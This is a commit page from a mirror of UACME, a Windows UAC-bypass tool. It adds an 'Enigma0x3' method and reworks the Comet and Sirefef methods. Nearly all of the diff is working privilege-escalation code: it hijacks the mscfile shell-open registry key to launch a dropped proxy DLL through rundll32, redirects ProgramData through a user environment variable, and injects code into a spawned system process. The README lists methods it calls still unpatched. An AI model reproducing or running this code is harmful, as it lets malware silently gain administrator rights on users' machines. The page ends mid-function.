Rooba
/
UACME
mirror of https://github.com/hfiref0x/UACME.git
1
1
Fork 0
Code Issues Packages Projects Releases Wiki Activity

v 2.5.3 

Enigma0x3 method integrated as #25, some tweaks
This commit is contained in:
hfiref0x 2017-01-18 14:45:50 +07:00
parent 76632e03b4
commit 794f24ade8
23 changed files with 679 additions and 247 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

BIN
Compiled/Akagi32.exe
View File

Binary file not shown.

BIN
Compiled/Akagi64.exe
View File

Binary file not shown.

10
README.md
View File

@ -36,7 +36,8 @@ Keys (watch debug ouput with dbgview or similar for more info):
* 21 - Hybrid method, abusing SxS DotLocal and targeting sysprep, works from Windows 7 up to 10rs2 14997; * 21 - Hybrid method, abusing SxS DotLocal and targeting sysprep, works from Windows 7 up to 10rs2 14997;
* 22 - Hybrid method, abusing SxS DotLocal and targeting consent to gain system privileges, works from Windows 7 up to 10rs2 14997; * 22 - Hybrid method, abusing SxS DotLocal and targeting consent to gain system privileges, works from Windows 7 up to 10rs2 14997;
* 23 - Hybrid method, abusing Package Manager and DISM, works from Windows 7 up to 10rs2 14997; * 23 - Hybrid method, abusing Package Manager and DISM, works from Windows 7 up to 10rs2 14997;
* 24 - Original Comet method from BreakingMalware, abuses current user environment variables and CompMgmtLauncher.exe, works from Windows 7 up to 10rs2 15007. * 24 - Original Comet method from BreakingMalware, abuses current user environment variables and CompMgmtLauncher.exe, works from Windows 7 up to 10rs2 15007;
* 25 - Original method from Enigma0x3, abuses shell command execution logic used by autoelevated applications, works from Windows 7 up to 10rs2 15007.
Note: Note:
* Several methods require process injection, so they won't work from wow64, use x64 edition of this tool; * Several methods require process injection, so they won't work from wow64, use x64 edition of this tool;
@ -86,7 +87,7 @@ Methods fixed:
* 22 - Windows 10 RS2 starting from public 1500X build (delivery interface altered, method itself still work); * 22 - Windows 10 RS2 starting from public 1500X build (delivery interface altered, method itself still work);
* 23 - Windows 10 RS2 starting from public 1500X build (delivery interface altered, method itself still work). * 23 - Windows 10 RS2 starting from public 1500X build (delivery interface altered, method itself still work).
** 24 is not fixed as at 17 January 2017. ** 24, 25 are not fixed as at 18 January 2017.
If you wondering why this still exist and work here is the explanation, an official Microsoft WHITEFLAG (including totally incompetent statements as bonus) If you wondering why this still exist and work here is the explanation, an official Microsoft WHITEFLAG (including totally incompetent statements as bonus)
@ -106,8 +107,8 @@ https://blogs.msdn.microsoft.com/oldnewthing/20160816-00/?p=94105
# VirusTotal reference report # VirusTotal reference report
* Akagi32 https://www.virustotal.com/en/file/d7f2d1ddb7807be1c1f8d8ceb770e9e5ddca2ad638541065e07073d438369660/analysis/ * Akagi32 https://www.virustotal.com/en/file/2c3639e512a4726e3a7d6a82a23db8dda079482584bc4987b66efe45a652981e/analysis/
* Akagi64 https://www.virustotal.com/en/file/82bf545c9af11bdb4ece39f837d168cee56c45f3c3544338fe31189eebb243d1/analysis/ * Akagi64 https://www.virustotal.com/en/file/4a90948c7ac0c09d7340f5cfb0801285fe5ca4d2ed713c5e82b2799bb80feea1/analysis/
# Build # Build
@ -122,6 +123,7 @@ https://blogs.msdn.microsoft.com/oldnewthing/20160816-00/?p=94105
* Beyond good ol' Run key, series of articles, http://www.hexacorn.com/blog * Beyond good ol' Run key, series of articles, http://www.hexacorn.com/blog
* KernelMode.Info UACMe thread, http://www.kernelmode.info/forum/viewtopic.php?f=11&t=3643 * KernelMode.Info UACMe thread, http://www.kernelmode.info/forum/viewtopic.php?f=11&t=3643
* Command Injection/Elevation - Environment Variables Revisited, https://breakingmalware.com/vulnerabilities/command-injection-and-elevation-environment-variables-revisited * Command Injection/Elevation - Environment Variables Revisited, https://breakingmalware.com/vulnerabilities/command-injection-and-elevation-environment-variables-revisited
* "Fileless" UAC Bypass Using eventvwr.exe and Registry Hijacking, https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/
# Authors # Authors

BIN
Source/Akagi/Resource.rc
View File

Binary file not shown.

BIN
Source/Akagi/bin/fubuki32.cd
View File

Binary file not shown.

BIN
Source/Akagi/bin/fubuki64.cd
View File

Binary file not shown.

220
Source/Akagi/comet.c
View File

@ -4,9 +4,9 @@
* *
* TITLE: COMET.C * TITLE: COMET.C
* *
* VERSION: 2.52 * VERSION: 2.53
* *
* DATE: 17 Jan 2017 * DATE: 18 Jan 2017
* *
* Comet method (c) BreakingMalware * Comet method (c) BreakingMalware
* For description please visit original URL * For description please visit original URL
@ -27,46 +27,46 @@
* *
* Purpose: * Purpose:
* *
* Remove of set current user environment variable. * Remove or set current user environment variable.
* *
*/ */
BOOL ucmSetEnvVariable( BOOL ucmSetEnvVariable(
_In_ BOOL fRemove, _In_ BOOL fRemove,
_In_ LPWSTR lpVariableName, _In_ LPWSTR lpVariableName,
_In_opt_ LPWSTR lpVariableData _In_opt_ LPWSTR lpVariableData
) )
{ {
BOOL bResult = FALSE, bCond = FALSE; BOOL bResult = FALSE, bCond = FALSE;
HKEY hKey = NULL; HKEY hKey = NULL;
do { do {
if (lpVariableName == NULL) if (lpVariableName == NULL)
break; break;
if ((lpVariableData == NULL) && (fRemove != TRUE)) if ((lpVariableData == NULL) && (fRemove != TRUE))
break; break;
if (RegOpenKey(HKEY_CURRENT_USER, L"Environment", &hKey) != ERROR_SUCCESS) if (RegOpenKey(HKEY_CURRENT_USER, L"Environment", &hKey) != ERROR_SUCCESS)
break; break;
if (fRemove) { if (fRemove) {
RegDeleteValue(hKey, lpVariableName); RegDeleteValue(hKey, lpVariableName);
} }
else { else {
if (RegSetValueEx(hKey, lpVariableName, 0, REG_SZ, (BYTE*)lpVariableData, if (RegSetValueEx(hKey, lpVariableName, 0, REG_SZ, (BYTE*)lpVariableData,
(DWORD)(_strlen(lpVariableData) * sizeof(WCHAR))) != ERROR_SUCCESS) (DWORD)(_strlen(lpVariableData) * sizeof(WCHAR))) != ERROR_SUCCESS)
{ {
break; break;
} }
} }
bResult = TRUE; bResult = TRUE;
} while (bCond); } while (bCond);
if (hKey != NULL) if (hKey != NULL)
RegCloseKey(hKey); RegCloseKey(hKey);
return bResult; return bResult;
} }
/* /*
@ -80,112 +80,116 @@ BOOL ucmSetEnvVariable(
* *
*/ */
BOOL ucmCometMethod( BOOL ucmCometMethod(
LPWSTR lpszPayload _In_ LPWSTR lpszPayload
) )
{ {
#ifndef _WIN64 #ifndef _WIN64
PVOID OldValue = NULL; PVOID OldValue = NULL;
#endif #endif
BOOL bCond = FALSE, bResult = FALSE; BOOL bCond = FALSE, bResult = FALSE;
WCHAR szCombinedPath[MAX_PATH * 2], szLinkFile[MAX_PATH * 3]; WCHAR szCombinedPath[MAX_PATH * 2], szLinkFile[MAX_PATH * 3];
HRESULT hResult; HRESULT hResult;
IPersistFile *persistFile = NULL; IPersistFile *persistFile = NULL;
IShellLink *newLink = NULL; IShellLink *newLink = NULL;
if (lpszPayload == NULL)
return FALSE;
#ifndef _WIN64 #ifndef _WIN64
if (g_ctx.IsWow64) { if (g_ctx.IsWow64) {
if (!NT_SUCCESS(RtlWow64EnableFsRedirectionEx((PVOID)TRUE, &OldValue))) if (!NT_SUCCESS(RtlWow64EnableFsRedirectionEx((PVOID)TRUE, &OldValue)))
return FALSE; return FALSE;
} }
#endif #endif
do { do {
RtlSecureZeroMemory(szCombinedPath, sizeof(szCombinedPath)); RtlSecureZeroMemory(szCombinedPath, sizeof(szCombinedPath));
_strcpy(szCombinedPath, g_ctx.szTempDirectory); _strcpy(szCombinedPath, g_ctx.szTempDirectory);
_strcat(szCombinedPath, L"huy32"); _strcat(szCombinedPath, L"huy32");
if (!CreateDirectory(szCombinedPath, NULL)) {//%temp%\Comet if (!CreateDirectory(szCombinedPath, NULL)) {//%temp%\Comet
if (GetLastError() != ERROR_ALREADY_EXISTS) if (GetLastError() != ERROR_ALREADY_EXISTS)
break; break;
} }
_strcpy(szLinkFile, szCombinedPath); _strcpy(szLinkFile, szCombinedPath);
_strcat(szLinkFile, T_CLSID_MYCOMPUTER_COMET); _strcat(szLinkFile, T_CLSID_MYCOMPUTER_COMET);
if (!CreateDirectory(szLinkFile, NULL)) {//%temp%\<targetdir>\Comet.{20D04FE0-3AEA-1069-A2D8-08002B30309D} if (!CreateDirectory(szLinkFile, NULL)) {//%temp%\<targetdir>\Comet.{20D04FE0-3AEA-1069-A2D8-08002B30309D}
if (GetLastError() != ERROR_ALREADY_EXISTS) if (GetLastError() != ERROR_ALREADY_EXISTS)
break; break;
} }
if (!ucmSetEnvVariable(FALSE, T_PROGRAMDATA, szCombinedPath)) if (!ucmSetEnvVariable(FALSE, T_PROGRAMDATA, szCombinedPath))
break; break;
_strcat(szCombinedPath, TEXT("\\Microsoft")); _strcat(szCombinedPath, TEXT("\\Microsoft"));
if (!CreateDirectory(szCombinedPath, NULL)) {//%temp%\Comet\Microsoft if (!CreateDirectory(szCombinedPath, NULL)) {//%temp%\Comet\Microsoft
if (GetLastError() != ERROR_ALREADY_EXISTS) if (GetLastError() != ERROR_ALREADY_EXISTS)
break; break;
} }
_strcat(szCombinedPath, TEXT("\\Windows")); _strcat(szCombinedPath, TEXT("\\Windows"));
if (!CreateDirectory(szCombinedPath, NULL)) {//%temp%\Comet\Microsoft\Windows if (!CreateDirectory(szCombinedPath, NULL)) {//%temp%\Comet\Microsoft\Windows
if (GetLastError() != ERROR_ALREADY_EXISTS) if (GetLastError() != ERROR_ALREADY_EXISTS)
break; break;
} }
_strcat(szCombinedPath, TEXT("\\Start Menu")); _strcat(szCombinedPath, TEXT("\\Start Menu"));
if (!CreateDirectory(szCombinedPath, NULL)) {//%temp%\Comet\Microsoft\Windows\Start Menu if (!CreateDirectory(szCombinedPath, NULL)) {//%temp%\Comet\Microsoft\Windows\Start Menu
if (GetLastError() != ERROR_ALREADY_EXISTS) if (GetLastError() != ERROR_ALREADY_EXISTS)
break; break;
} }
_strcat(szCombinedPath, TEXT("\\Programs")); _strcat(szCombinedPath, TEXT("\\Programs"));
if (!CreateDirectory(szCombinedPath, NULL)) {//%temp%\Comet\Microsoft\Windows\Start Menu\Programs if (!CreateDirectory(szCombinedPath, NULL)) {//%temp%\Comet\Microsoft\Windows\Start Menu\Programs
if (GetLastError() != ERROR_ALREADY_EXISTS) if (GetLastError() != ERROR_ALREADY_EXISTS)
break; break;
} }
_strcat(szCombinedPath, TEXT("\\Administrative Tools")); _strcat(szCombinedPath, TEXT("\\Administrative Tools"));
if (!CreateDirectory(szCombinedPath, NULL)) {//%temp%\Comet\Microsoft\Windows\Start Menu\Programs\Administrative Tools if (!CreateDirectory(szCombinedPath, NULL)) {//%temp%\Comet\Microsoft\Windows\Start Menu\Programs\Administrative Tools
if (GetLastError() != ERROR_ALREADY_EXISTS) if (GetLastError() != ERROR_ALREADY_EXISTS)
break; break;
} }
hResult = CoInitialize(NULL); hResult = CoInitialize(NULL);
if (SUCCEEDED(hResult)) { if (SUCCEEDED(hResult)) {
hResult = CoCreateInstance(&CLSID_ShellLink, NULL, CLSCTX_INPROC_SERVER, &IID_IShellLink, (LPVOID *)&newLink); hResult = CoCreateInstance(&CLSID_ShellLink, NULL, CLSCTX_INPROC_SERVER, &IID_IShellLink, (LPVOID *)&newLink);
if (SUCCEEDED(hResult)) { if (SUCCEEDED(hResult)) {
newLink->lpVtbl->SetPath(newLink, lpszPayload); newLink->lpVtbl->SetPath(newLink, lpszPayload);
newLink->lpVtbl->SetArguments(newLink, L""); newLink->lpVtbl->SetArguments(newLink, L"");
newLink->lpVtbl->SetDescription(newLink, L"Comet method"); newLink->lpVtbl->SetDescription(newLink, L"Comet method");
hResult = newLink->lpVtbl->QueryInterface(newLink, &IID_IPersistFile, (void **)&persistFile); hResult = newLink->lpVtbl->QueryInterface(newLink, &IID_IPersistFile, (void **)&persistFile);
if (SUCCEEDED(hResult)) { if (SUCCEEDED(hResult)) {
_strcpy(szLinkFile, szCombinedPath); _strcpy(szLinkFile, szCombinedPath);
_strcat(szLinkFile, L"\\Computer Management.lnk"); _strcat(szLinkFile, L"\\Computer Management.lnk");
if (SUCCEEDED(persistFile->lpVtbl->Save(persistFile, szLinkFile, TRUE))) { if (SUCCEEDED(persistFile->lpVtbl->Save(persistFile, szLinkFile, TRUE))) {
persistFile->lpVtbl->Release(persistFile); persistFile->lpVtbl->Release(persistFile);
_strcpy(szCombinedPath, g_ctx.szTempDirectory); _strcpy(szCombinedPath, g_ctx.szTempDirectory);
_strcat(szCombinedPath, L"huy32"); _strcat(szCombinedPath, L"huy32");
_strcpy(szLinkFile, szCombinedPath); _strcpy(szLinkFile, szCombinedPath);
_strcat(szLinkFile, T_CLSID_MYCOMPUTER_COMET); _strcat(szLinkFile, T_CLSID_MYCOMPUTER_COMET);
ShellExecute(NULL, L"Manage", szLinkFile, L"", szCombinedPath, SW_SHOW); ShellExecute(NULL, L"Manage", szLinkFile, L"", szCombinedPath, SW_SHOW);
bResult = TRUE; bResult = TRUE;
} }
} }
newLink->lpVtbl->Release(newLink); newLink->lpVtbl->Release(newLink);
} }
} }
} while (bCond); } while (bCond);
#ifndef _WIN64 #ifndef _WIN64
if (g_ctx.IsWow64) { if (g_ctx.IsWow64) {
RtlWow64EnableFsRedirectionEx(OldValue, &OldValue); RtlWow64EnableFsRedirectionEx(OldValue, &OldValue);
} }
#endif #endif
ucmSetEnvVariable(TRUE, T_PROGRAMDATA, NULL); ucmSetEnvVariable(TRUE, T_PROGRAMDATA, NULL);
return bResult; return bResult;
} }

6
Source/Akagi/consts.h
View File

@ -4,9 +4,9 @@
* *
* TITLE: CONSTS.H * TITLE: CONSTS.H
* *
* VERSION: 2.52 * VERSION: 2.53
* *
* DATE: 17 Jan 2017 * DATE: 18 Jan 2017
* *
* Global consts definition file. * Global consts definition file.
* *
@ -37,6 +37,7 @@
#define MANIFEST_EXT L".manifest" #define MANIFEST_EXT L".manifest"
#define ELLOCNAK_MSU L"ellocnak.msu" #define ELLOCNAK_MSU L"ellocnak.msu"
#define NTDLL_DLL L"ntdll.dll"
#define KERNEL32_DLL L"kernel32.dll" #define KERNEL32_DLL L"kernel32.dll"
#define OLE32_DLL L"ole32.dll" #define OLE32_DLL L"ole32.dll"
#define SHELL32_DLL L"shell32.dll" #define SHELL32_DLL L"shell32.dll"
@ -73,6 +74,7 @@
#define SPINSTALL_EXE L"spinstall.exe" #define SPINSTALL_EXE L"spinstall.exe"
#define CONSENT_EXE L"consent.exe" #define CONSENT_EXE L"consent.exe"
#define EVENTVWR_EXE L"eventvwr.exe" #define EVENTVWR_EXE L"eventvwr.exe"
#define COMPMGMTLAUNCHER_EXE L"CompMgmtLauncher.exe"
#define PKGMGR_EXE L"pkgmgr.exe" #define PKGMGR_EXE L"pkgmgr.exe"
#define SYSPREP_DIR L"sysprep\\" #define SYSPREP_DIR L"sysprep\\"
#define INETSRV_DIR L"inetsrv\\" #define INETSRV_DIR L"inetsrv\\"

103
Source/Akagi/enigma0x3.c Normal file
View File

@ -0,0 +1,103 @@
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2016 - 2017
*
* TITLE: ENIGMA0X3.C
*
* VERSION: 2.53
*
* DATE: 18 Jan 2017
*
* Enigma0x3 autoelevation method.
* Used by unnamed MSIL malware.
*
* For description please visit original URL
* https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
*
*******************************************************************************/
#include "global.h"
/*
* ucmHijackShellCommandMethod
*
* Purpose:
*
* Overwrite Default value of mscfile shell command with your payload.
*
*/
BOOL ucmHijackShellCommandMethod(
_In_opt_ LPWSTR lpszPayload,
_In_ LPWSTR lpszTargetApp
)
{
BOOL bCond = FALSE, bResult = FALSE;
HKEY hKey = NULL;
LRESULT lResult;
LPWSTR lpBuffer = NULL;
SIZE_T sz;
WCHAR szBuffer[MAX_PATH * 2];
if (lpszTargetApp == NULL)
return FALSE;
do {
sz = 0;
if (lpszPayload == NULL) {
sz = 0x1000;
}
else {
sz = _strlen(lpszPayload);
}
lpBuffer = RtlAllocateHeap(g_ctx.Peb->ProcessHeap, HEAP_ZERO_MEMORY, sz);
if (lpBuffer == NULL)
break;
if (lpszPayload != NULL) {
_strcpy(lpBuffer, lpszPayload);
}
else {
//no payload specified, use default fubuki, drop dll first as wdscore.dll to %temp%
RtlSecureZeroMemory(szBuffer, sizeof(szBuffer));
_strcpy(szBuffer, g_ctx.szTempDirectory);
_strcat(szBuffer, WDSCORE_DLL);
//write proxy dll to disk
if (!supWriteBufferToFile(szBuffer, g_ctx.PayloadDll, g_ctx.PayloadDllSize)) {
break;
}
//now rundll it
_strcpy(lpBuffer, L"rundll32.exe ");
_strcat(lpBuffer, szBuffer);
_strcat(lpBuffer, L",WdsInitialize");
}
lResult = RegCreateKeyEx(HKEY_CURRENT_USER,
L"Software\\Classes\\mscfile\\shell\\open\\command", 0, NULL, REG_OPTION_NON_VOLATILE, MAXIMUM_ALLOWED, NULL, &hKey, NULL);
if (lResult != ERROR_SUCCESS)
break;
lResult = RegSetValueEx(hKey, L"", 0, REG_SZ, (BYTE*)lpBuffer,
(DWORD)(_strlen(lpBuffer) * sizeof(WCHAR)));
if (lResult != ERROR_SUCCESS)
break;
bResult = supRunProcess(lpszTargetApp, NULL);
} while (bCond);
if (lpBuffer != NULL)
RtlFreeHeap(g_ctx.Peb->ProcessHeap, 0, lpBuffer);
if (hKey != NULL)
RegCloseKey(hKey);
return bResult;
}

24
Source/Akagi/enigma0x3.h Normal file
View File

@ -0,0 +1,24 @@
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2016 - 2017
*
* TITLE: ENIGMA0X3.H
*
* VERSION: 2.53
*
* DATE: 18 Jan 2017
*
* Prototypes and definitions for Enigma0x3 autoelevation method.
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
*
*******************************************************************************/
#pragma once
BOOL ucmHijackShellCommandMethod(
_In_opt_ LPWSTR lpszPayload,
_In_ LPWSTR lpszTargetApp
);

6
Source/Akagi/global.h
View File

@ -4,9 +4,9 @@
* *
* TITLE: GLOBAL.H * TITLE: GLOBAL.H
* *
* VERSION: 2.52 * VERSION: 2.53
* *
* DATE: 17 Jan 2017 * DATE: 18 Jan 2017
* *
* Common header file for the program support routines. * Common header file for the program support routines.
* *
@ -78,6 +78,7 @@ typedef enum _UACBYPASSMETHOD {
UacMethodSXSConsent, UacMethodSXSConsent,
UacMethodDISM, UacMethodDISM,
UacMethodComet, UacMethodComet,
UacMethodEnigma0x3,
UacMethodMax UacMethodMax
} UACBYPASSMETHOD; } UACBYPASSMETHOD;
@ -98,6 +99,7 @@ typedef enum _UACBYPASSMETHOD {
#include "carberp.h" #include "carberp.h"
#include "hybrids.h" #include "hybrids.h"
#include "comet.h" #include "comet.h"
#include "enigma0x3.h"
//default execution flow //default execution flow
#define AKAGI_FLAG_KILO 0 #define AKAGI_FLAG_KILO 0

240
Source/Akagi/hybrids.c
View File

@ -1,12 +1,12 @@
/******************************************************************************* /*******************************************************************************
* *
* (C) COPYRIGHT AUTHORS, 2015 - 2016 * (C) COPYRIGHT AUTHORS, 2015 - 2017
* *
* TITLE: HYBRIDS.C * TITLE: HYBRIDS.C
* *
* VERSION: 2.51 * VERSION: 2.53
* *
* DATE: 10 July 2016 * DATE: 18 Jan 2017
* *
* Hybrid UAC bypass methods. * Hybrid UAC bypass methods.
* *
@ -19,6 +19,7 @@
#include "global.h" #include "global.h"
#include "makecab.h" #include "makecab.h"
#include "manifest.h" #include "manifest.h"
#include "sirefef.h"
ELOAD_PARAMETERS_SIREFEF g_ElevParamsSirefef; ELOAD_PARAMETERS_SIREFEF g_ElevParamsSirefef;
@ -380,6 +381,90 @@ DWORD WINAPI ucmElevatedLaunchProc(
return S_OK; return S_OK;
} }
/*
* ucmSirefefBuildControlContext
*
* Purpose:
*
* Preparations for Sirefef method.
*
*/
PZA_CONTROL_CONTEXT ucmSirefefBuildControlContext(
VOID
)
{
BOOL bCond = FALSE, bSuccess = FALSE;
ZA_CONTROL_CONTEXT *ctx = NULL;
SIZE_T sz;
PVOID Routine;
do {
sz = sizeof(ZA_CONTROL_CONTEXT);
NtAllocateVirtualMemory(NtCurrentProcess(), &ctx, 0, &sz, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
if (ctx == NULL)
break;
RtlSecureZeroMemory(ctx, sz);
Routine = supNativeGetProcAddress(KERNEL32_DLL, "CopyFileW");
if (Routine == NULL)
break;
ctx->pCopyFileW = RtlEncodePointer(Routine);
Routine = supNativeGetProcAddress(KERNEL32_DLL, "CreateRemoteThread");
if (Routine == NULL)
break;
ctx->pCreateRemoteThread = RtlEncodePointer(Routine);
Routine = supNativeGetProcAddress(KERNEL32_DLL, "WaitForSingleObject");
if (Routine == NULL)
break;
ctx->pWaitForSingleObject = RtlEncodePointer(Routine);
Routine = supNativeGetProcAddress(KERNEL32_DLL, "CreateProcessW");
if (Routine == NULL)
break;
ctx->pCreateProcess = RtlEncodePointer(Routine);
Routine = supNativeGetProcAddress(KERNEL32_DLL, "WriteProcessMemory");
if (Routine == NULL)
break;
ctx->pWriteProcessMemory = RtlEncodePointer(Routine);
Routine = supNativeGetProcAddress(NTDLL_DLL, "NtClose");
if (Routine == NULL)
break;
ctx->pNtClose = RtlEncodePointer(Routine);
Routine = supNativeGetProcAddress(NTDLL_DLL, "NtAllocateVirtualMemory");
if (Routine == NULL)
break;
ctx->pNtAllocateVirtualMemory = RtlEncodePointer(Routine);
Routine = supNativeGetProcAddress(NTDLL_DLL, "NtTerminateProcess");
if (Routine == NULL)
break;
ctx->pNtTerminateProcess = RtlEncodePointer(Routine);
ctx->SfCopyFile = RtlEncodePointer(ucmMasqueradedMoveFileCOM);
ctx->ElevatedProcedure = RtlEncodePointer(ucmElevatedLaunchProc);
ctx->ElevatedParameters = &g_ElevParamsSirefef;
ctx->RunProcessEx = RtlEncodePointer(supRunProcessEx);
bSuccess = TRUE;
} while (bCond);
if (bSuccess != TRUE) {
sz = 0;
NtFreeVirtualMemory(NtCurrentProcess(), &ctx, &sz, MEM_RELEASE);
}
return ctx;
}
/* /*
* ucmSirefefMethod * ucmSirefefMethod
* *
@ -391,23 +476,20 @@ DWORD WINAPI ucmElevatedLaunchProc(
BOOL ucmSirefefMethod( BOOL ucmSirefefMethod(
PVOID ProxyDll, PVOID ProxyDll,
DWORD ProxyDllSize DWORD ProxyDllSize
) )
{ {
BOOL cond = FALSE, bResult = FALSE; BOOL bResult = FALSE, bCond = FALSE;
ZA_CONTROL_CONTEXT *za_ctx = NULL;
SIZE_T sz;
DWORD c; DWORD c;
HANDLE hProcess = NULL, hRemoteThread = NULL; HANDLE hProcess = NULL, hRemoteThread = NULL;
HINSTANCE selfmodule = GetModuleHandle(NULL); HINSTANCE selfmodule = GetModuleHandle(NULL);
PIMAGE_DOS_HEADER pdosh = (PIMAGE_DOS_HEADER)selfmodule; PIMAGE_DOS_HEADER pdosh = (PIMAGE_DOS_HEADER)selfmodule;
PIMAGE_FILE_HEADER fh = (PIMAGE_FILE_HEADER)((char *)pdosh + pdosh->e_lfanew + sizeof(DWORD)); PIMAGE_FILE_HEADER fh = (PIMAGE_FILE_HEADER)((char *)pdosh + pdosh->e_lfanew + sizeof(DWORD));
PIMAGE_OPTIONAL_HEADER opth = (PIMAGE_OPTIONAL_HEADER)((char *)fh + sizeof(IMAGE_FILE_HEADER)); PIMAGE_OPTIONAL_HEADER opth = (PIMAGE_OPTIONAL_HEADER)((char *)fh + sizeof(IMAGE_FILE_HEADER));
LPVOID remotebuffer = NULL, newEp, newDp; LPVOID remotebuffer = NULL, newEp, newDp;
SIZE_T NumberOfBytesWritten = 0;
ELOAD_PARAMETERS_SIREFEF *elvpar = &g_ElevParamsSirefef;
LPVOID elevproc = ucmElevatedLaunchProc;
WCHAR szBuffer[MAX_PATH * 2];
WCHAR szDest[MAX_PATH * 2];
WCHAR szSource[MAX_PATH * 2];
if ( if (
(ProxyDll == NULL) || (ProxyDll == NULL) ||
@ -418,89 +500,105 @@ BOOL ucmSirefefMethod(
} }
do { do {
//put Fubuki dll as netutils to %temp% za_ctx = ucmSirefefBuildControlContext();
RtlSecureZeroMemory(szSource, sizeof(szSource)); if (za_ctx == NULL)
_strcpy(szSource, g_ctx.szTempDirectory); break;
_strcat(szSource, NETUTILS_DLL);
if (!supWriteBufferToFile(szSource, ProxyDll, ProxyDllSize)) { //put Fubuki dll as netutils to %temp%
_strcpy(za_ctx->szSource, g_ctx.szTempDirectory);
_strcat(za_ctx->szSource, NETUTILS_DLL);
if (!supWriteBufferToFile(za_ctx->szSource, ProxyDll, ProxyDllSize))
break; break;
}
//move dll to wbem target folder //move dll to wbem target folder
RtlSecureZeroMemory(szBuffer, sizeof(szBuffer)); _strcpy(za_ctx->szBuffer, g_ctx.szSystemDirectory);
_strcpy(szBuffer, g_ctx.szSystemDirectory); _strcat(za_ctx->szBuffer, WBEM_DIR);
_strcat(szBuffer, WBEM_DIR); za_ctx->SfCopyFile = RtlDecodePointer(za_ctx->SfCopyFile);
bResult = ucmMasqueradedMoveFileCOM(szSource, szBuffer); bResult = za_ctx->SfCopyFile(za_ctx->szSource, za_ctx->szBuffer);
if (!bResult) { if (!bResult)
break; break;
}
//copy 1st stage target process //copy 1st stage target process
RtlSecureZeroMemory(szSource, sizeof(szSource)); RtlSecureZeroMemory(za_ctx->szSource, sizeof(za_ctx->szSource));
_strcpy(szSource, g_ctx.szSystemDirectory); _strcpy(za_ctx->szSource, g_ctx.szSystemDirectory);
_strcat(szSource, CREDWIZ_EXE); _strcat(za_ctx->szSource, CREDWIZ_EXE);
RtlSecureZeroMemory(szDest, sizeof(szDest)); RtlSecureZeroMemory(za_ctx->szDest, sizeof(za_ctx->szDest));
_strcpy(szDest, g_ctx.szTempDirectory); _strcpy(za_ctx->szDest, g_ctx.szTempDirectory);
_strcat(szDest, OOBE_EXE); _strcat(za_ctx->szDest, OOBE_EXE);
if (!CopyFile(szSource, szDest, FALSE)) { za_ctx->pCopyFileW = RtlDecodePointer(za_ctx->pCopyFileW);
if (!za_ctx->pCopyFileW(za_ctx->szSource, za_ctx->szDest, FALSE))
break; break;
}
bResult = ucmMasqueradedMoveFileCOM(szDest, szBuffer); bResult = za_ctx->SfCopyFile(za_ctx->szDest, za_ctx->szBuffer);
if (!bResult) { if (!bResult)
break; break;
}
//setup basic shellcode routines //setup basic shellcode routines
RtlSecureZeroMemory(&g_ElevParamsSirefef, sizeof(g_ElevParamsSirefef)); za_ctx->pWaitForSingleObject = RtlDecodePointer(za_ctx->pWaitForSingleObject);
elvpar->xShellExecuteExW = (pfnShellExecuteExW)GetProcAddress(g_ctx.hShell32, "ShellExecuteExW"); za_ctx->ElevatedParameters->xShellExecuteExW = (pfnShellExecuteExW)GetProcAddress(g_ctx.hShell32, "ShellExecuteExW");
elvpar->xWaitForSingleObject = (pfnWaitForSingleObject)GetProcAddress(g_ctx.hKernel32, "WaitForSingleObject"); za_ctx->ElevatedParameters->xWaitForSingleObject = (pfnWaitForSingleObject)za_ctx->pWaitForSingleObject;
elvpar->xCloseHandle = (pfnCloseHandle)GetProcAddress(g_ctx.hKernel32, "CloseHandle"); za_ctx->pNtClose = RtlDecodePointer(za_ctx->pNtClose);
za_ctx->ElevatedParameters->xCloseHandle = (pfnCloseHandle)za_ctx->pNtClose;
//set shellcode 2nd stage target process //set shellcode 2nd stage target process
//c:\windows\system32\wbem\oobe.exe //c:\windows\system32\wbem\oobe.exe
RtlSecureZeroMemory(szBuffer, sizeof(szBuffer)); RtlSecureZeroMemory(za_ctx->szBuffer, sizeof(za_ctx->szBuffer));
_strcpy(elvpar->szTargetApp, g_ctx.szSystemDirectory); _strcpy(za_ctx->szBuffer, g_ctx.szSystemDirectory);
_strcat(elvpar->szTargetApp, WBEM_DIR); _strcat(za_ctx->szBuffer, WBEM_DIR);
_strcat(elvpar->szTargetApp, OOBE_EXE); _strcat(za_ctx->szBuffer, OOBE_EXE);
_strcpy(elvpar->szVerb, RUNAS_VERB); _strcpy(za_ctx->ElevatedParameters->szTargetApp, za_ctx->szBuffer);
_strcpy(za_ctx->ElevatedParameters->szVerb, RUNAS_VERB);
_strcpy(szBuffer, g_ctx.szSystemDirectory); //c:\windows\system32\credwiz.exe RtlSecureZeroMemory(za_ctx->szBuffer, sizeof(za_ctx->szBuffer));
_strcat(szBuffer, CREDWIZ_EXE);
_strcpy(za_ctx->szBuffer, g_ctx.szSystemDirectory); //c:\windows\system32\credwiz.exe
_strcat(za_ctx->szBuffer, CREDWIZ_EXE);
//run 1st stage target process //run 1st stage target process
hProcess = supRunProcessEx(szBuffer, NULL, NULL); za_ctx->RunProcessEx = RtlDecodePointer(za_ctx->RunProcessEx);
if (hProcess == NULL) { hProcess = za_ctx->RunProcessEx(za_ctx->szBuffer, NULL, NULL, NULL);
if (hProcess == NULL)
break; break;
}
remotebuffer = VirtualAllocEx(hProcess, NULL, (SIZE_T)opth->SizeOfImage, za_ctx->pNtAllocateVirtualMemory = RtlDecodePointer(za_ctx->pNtAllocateVirtualMemory);
MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
if (remotebuffer == NULL) { sz = (SIZE_T)opth->SizeOfImage;
